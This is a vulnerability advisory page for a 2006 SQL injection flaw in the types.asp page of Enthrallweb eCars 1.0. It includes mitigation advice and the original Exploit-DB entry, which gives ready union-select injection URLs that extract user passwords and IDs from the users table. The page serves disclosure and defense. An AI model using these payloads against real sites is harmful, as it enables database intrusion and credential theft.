Enthrallweb eCars 1.0 (types.asp) Remote SQL Injection Vulnerability

vendor:

eCars

by:

ajann

CVSS

HIGH

SQL Injection

CWE

Product Name: eCars

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Enthrallweb eCars 1.0 (types.asp) Remote SQL Injection Vulnerability

Enthrallweb eCars 1.0 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. This can allow the attacker to gain access to sensitive information such as user credentials and other confidential data stored in the database.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  Enthrallweb eCars 1.0 (types.asp) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.enthrallweb.us
# $$      :  179.40  USD

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//Types.asp?Type_id=[SQL]

Example:

Home >> Pass
//Types.asp?Type_id=-1%20union%20select%200,u_Password%20from%20users
Home >> user
//Types.asp?Type_id=-1%20union%20select%200,u_ID%20from%20users


[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-23]